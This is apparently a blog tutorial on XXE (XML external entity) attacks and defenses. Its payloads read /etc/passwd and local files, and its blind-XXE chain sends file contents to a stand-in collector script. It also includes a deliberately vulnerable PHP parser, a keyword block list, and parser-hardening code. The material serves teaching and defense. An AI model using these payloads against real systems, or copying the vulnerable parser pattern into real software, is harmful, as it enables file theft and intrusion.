Talking about XXE vulnerability attack and defense


I encountered an XXE vulnerability in a CTF competition. Since I had not studied this vulnerability at the time, I had no clue. To make up for my web security defense knowledge and reduce my weak spots on vulnerabilities, I have read some material about the XXE vulnerability, and I will share it after learning.

XML Foundation

Before introducing the XXE vulnerability, let's review the basics of XML. XML is designed to transfer and store data, with a focus on the content of the data; it separates the data from its HTML presentation and is a software- and hardware-independent way of exchanging information.

XML Document Structure

An XML document consists of the XML declaration, a DTD (document type definition, optional), and the document elements.

<?xml version="1.0"?> <!-- XML declaration (must be the first thing in the document) -->
<!-- Document Type Definition -->
<!DOCTYPE note [ <!-- Define this document as a note type document -->
<!ELEMENT note (to,from,head,body)> <!-- Define the note element with four child elements -->
<!ELEMENT to (#PCDATA)> <!-- Define the to element as "#PCDATA" (parsed character data) -->
<!ELEMENT from (#PCDATA)> <!-- Define the from element as "#PCDATA" -->
<!ELEMENT head (#PCDATA)> <!-- Define the head element as "#PCDATA" -->
<!ELEMENT body (#PCDATA)> <!-- Define the body element as "#PCDATA" -->
]>
<!-- Document element -->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

Since the XXE vulnerability is tied to DTDs, the concept of the DTD is explained in more detail.

DTD

A Document Type Definition (DTD) defines the legal building blocks of an XML document: it uses a set of legal elements to define the structure of the document. A DTD can be declared inline in the XML document (internal DTD) or referenced as an external file (external DTD).
Internal DTD declaration:

<!DOCTYPE root element [element declarations]>

Referencing an external DTD:

<!DOCTYPE root element SYSTEM "filename">

The important keywords in a DTD are:

  • DOCTYPE (declaration of the DTD)
  • ENTITY (declaration of an entity)
  • SYSTEM, PUBLIC (reference to an external resource)

Entity

An entity can be understood as a variable: it must be declared in the DTD, and its value can then be referenced elsewhere in the document.
Entities are classified into the following four types:

  • Built-in entities
  • Character entities
  • General entities
  • Parameter entities

Entities can also be divided into internal and external entities according to how they are referenced; the declarations for each are shown below.
For the complete entity categories, refer to DTD - Entities (https://www.tutorialspoint.com/dtd/dtd_entities.htm).

Introduction to Entity Category

A parameter entity is declared as <!ENTITY % name ...> and referenced as %name;. All other entities are declared as <!ENTITY name ...> and referenced as &name;.
Parameter entities can only be declared and referenced inside the DTD; the other (general) entities are declared in the DTD and referenced in the body of the XML document.

Internal entity:

<!ENTITY entity name "value of entity">

External entity:

<!ENTITY entity name SYSTEM "URI">

Parameter entity:

<!ENTITY % entity name "value of entity">
or
<!ENTITY % entity name SYSTEM "URI">

Example: internal general entity (i.e. an entity other than a parameter entity)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY name "nMask">]>
<foo>
<value>&name;</value>
</foo>

Example: parameter entity + external entity

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % name SYSTEM "file:///etc/passwd">
%name;
]>

Note: %name; (parameter entity) is referenced inside the DTD, while &name; (general entity) is referenced in the XML document body.

Since the XXE vulnerability is mainly caused by the DTD referencing external entities, it is important to look at which kinds of external entities can be referenced.

External entity

External entities are declared in the DTD with the syntax

<!ENTITY entity name SYSTEM "URI">

which references an external resource rather than an inline value. Which kinds of URI can be written there?
The main ones are file, http, https, ftp, etc.; the exact set of supported protocols depends on the parser and the program using it.

Example demonstration:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY content SYSTEM "file:///etc/passwd">]>
<foo>
<value>&content;</value>
</foo>

XXE Vulnerability

XXE stands for XML External Entity injection. The vulnerability arises when an application parses XML input without prohibiting the loading of external entities, so that a crafted document makes the parser load attacker-chosen external resources. The consequences include file reading, command execution, intranet port scanning, attacks on intranet sites, DoS attacks and other hazards. The trigger point is typically any place where an XML file can be uploaded or submitted: if the uploaded XML is not filtered, a malicious XML file gets parsed.

XXE Vulnerability Detection

The first step is to check whether the XML is parsed at all:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY name "my name is nMask">]>
<root>&name;</root>

If the page outputs my name is nMask, the XML input is parsed (and the entity was expanded).

The second step is to detect whether the server's parser loads external entities referenced from the DTD:

<!DOCTYPE ANY [
<!ENTITY % name SYSTEM "http://localhost/index.html">
%name;
]>

You can tell whether the target server requested the referenced URL (index.html here) by looking at the access log of the server you control.

If external entities are loaded, there is a high probability of an XXE vulnerability.

XXE Exploitation

XXE vulnerabilities can cause many kinds of damage, such as file reading, command execution, intranet port scanning, attacks on intranet sites, DoS attacks, etc. Here, reading arbitrary files is tested.

Read arbitrary files

Since I was testing on Windows, I had it read the contents of the test.txt file on the C drive.

On Linux, sensitive files such as /etc/passwd can be read the same way.

Whether such a file read succeeds depends not only on the DTD being able to reference external entities, but also on the parsed result being output back in the response, i.e. on there being an echo. So if the program does not echo the content, how can the file be read? That requires a blind XXE technique.

Blind XXE vulnerability

With traditional XXE, an attacker can read server-side files only if the server echoes the parsed content or leaks it in an error message. When there is no echo, blind XXE constructs an out-of-band channel to extract the data.

Create test.php with the following content (this runs on the attacker-controlled server and simply stores whatever arrives in the file parameter):

<?php
// Store the value of the "file" query parameter in test.txt
file_put_contents("test.txt", $_GET['file']);
?>

Create index.php with the following content (this plays the vulnerable application: it parses an XML document whose DTD pulls in an external DTD from test.xml):

<?php
// Deliberately vulnerable: the DTD declares two external parameter entities and
// references them, so the parser fetches test.xml and evaluates what it defines.
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "file:///C:/test.txt">
<!ENTITY % remote SYSTEM "http://localhost/test.xml">
%remote;
%all;
%send;
]>
EOF;
$data = simplexml_load_string($xml);
echo "<pre>";
print_r($data);
?>

Create test.xml with the following content:

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://localhost/test.php?file=%file;'>">

When http://localhost/index.php is requested, the vulnerable server reads the contents of C:/test.txt, sends them as the file parameter to test.php on the attacker's server, and test.php writes the received data to its local test.txt.

Note: XXE has many other uses and defensive postures that are not covered here.

XXE Vulnerability Fixes and Defenses

Use the mechanism your language or parser provides to disable external entity loading.

PHP:

libxml_disable_entity_loader(true);

(Note that since libxml 2.9.0 external entity loading is disabled by default, and PHP 8.0 deprecates this function.)

Java (the disallow-doctype-decl feature is the primary defense; setExpandEntityReferences(false) on its own does not stop external entities from being loaded):

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // reject any DOCTYPE, so no entities at all
dbf.setExpandEntityReferences(false);

Python (lxml):

from lxml import etree
# resolve_entities=False stops the parser from substituting entity references
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
Filter XML data submitted by users

Filter on the keywords <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC. This is a last line of defense, not a substitute for disabling external entities in the parser.
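The following Python example is added here and is not code from the original post. It brings together the two detection steps above (does the parser expand an internal entity? does the DTD declare an external entity?) and the defensive checks in this section, using only the standard library: expat in inspect-only mode (parameter-entity parsing off, no external entity handler installed, so nothing is ever fetched) reports what the DTD declares, broken down by the entity categories introduced earlier; a policy function refuses documents the way Java's disallow-doctype-decl does; and ElementTree performs the real parse only after the check passes. The sample documents are constructed, modelled on the page's probes and on the DTD in index.php, and the function names are my own.

```python
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed samples (not taken verbatim from the page), modelled on the
# detection probes above and on the DTD used in index.php.
SAMPLE_STEP1 = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE ANY [\n'
    '<!ENTITY name "my name is nMask">]>\n'
    '<root>&name;</root>\n'
)
SAMPLE_STEP2 = (
    '<!DOCTYPE ANY [\n'
    '<!ENTITY % name SYSTEM "http://localhost/index.html">\n'
    '%name;\n'
    ']>\n'
)
SAMPLE_BLIND = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE ANY [\n'
    '<!ENTITY % file SYSTEM "file:///C:/test.txt">\n'
    '<!ENTITY % remote SYSTEM "http://localhost/test.xml">\n'
    '%remote;\n'
    '%all;\n'
    '%send;\n'
    ']>\n'
)


def inspect_xml(text):
    """Report the DOCTYPE and entity declarations in `text` without resolving
    anything: parameter-entity parsing is off and no ExternalEntityRefHandler
    is installed, so expat never opens a file or a network connection."""
    report = {"doctype": None, "entities": [], "parse_error": None}
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = {"name": name, "system_id": system_id,
                             "public_id": public_id}

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        report["entities"].append({
            "name": name,
            "parameter": bool(is_param),            # %name; vs &name;
            "external": system_id is not None or public_id is not None,
            "system_id": system_id,
            "scheme": urlsplit(system_id).scheme if system_id else None,
        })

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(text, True)
    except expat.ExpatError as exc:
        # A DTD-only probe has no root element, so expat reports an error at
        # end of input; the declaration handlers have already fired by then.
        report["parse_error"] = str(exc)
    return report


def policy_violation(report, allow_doctype=False):
    """Return why the document must be refused, or None if it passes.
    The default mirrors disallow-doctype-decl: any DTD at all is rejected.
    With allow_doctype=True only external DTDs and external entities are."""
    doctype = report["doctype"]
    if doctype is None:
        return None
    if doctype["system_id"] or doctype["public_id"]:
        return "DOCTYPE references an external DTD"
    for ent in report["entities"]:
        if ent["external"]:
            kind = "parameter" if ent["parameter"] else "general"
            return "external %s entity '%s' -> %s" % (kind, ent["name"], ent["system_id"])
    if not allow_doctype:
        return "DOCTYPE is not allowed"
    return None


def parse_naive(text):
    """What a parser that expands entities does: the step-1 probe echoes the
    entity value, which is exactly the signal the detection section looks for."""
    return ET.fromstring(text)


def parse_untrusted(text, allow_doctype=False):
    """Hardened entry point: inspect first, parse only if the policy passes."""
    reason = policy_violation(inspect_xml(text), allow_doctype)
    if reason is not None:
        raise ValueError("refused XML input: " + reason)
    return ET.fromstring(text)


def keyword_filter_hit(text):
    """The keyword filter suggested above, kept for comparison: it also fires
    on ordinary element content that merely contains one of the words."""
    return any(k in text for k in ("<!DOCTYPE", "<!ENTITY", "SYSTEM", "PUBLIC"))
```

Keep `allow_doctype=False` unless the application genuinely needs DTDs: with it enabled, internal entities are still expanded by ElementTree, so a document may pass the check and yet expand to far more text than it contains. The keyword filter is there to show its weakness, not to recommend it: a harmless `<root>SYSTEM status: PUBLIC</root>` trips it, while the DTD-aware check lets it through.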


Title: Talking about XXE vulnerability attack and defense

Author: nmask

Published: 2017-06-20 10:06

Last updated: 2019-08-16 15:08

Original link: https://thief.one/2017/06/20/1/en/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.
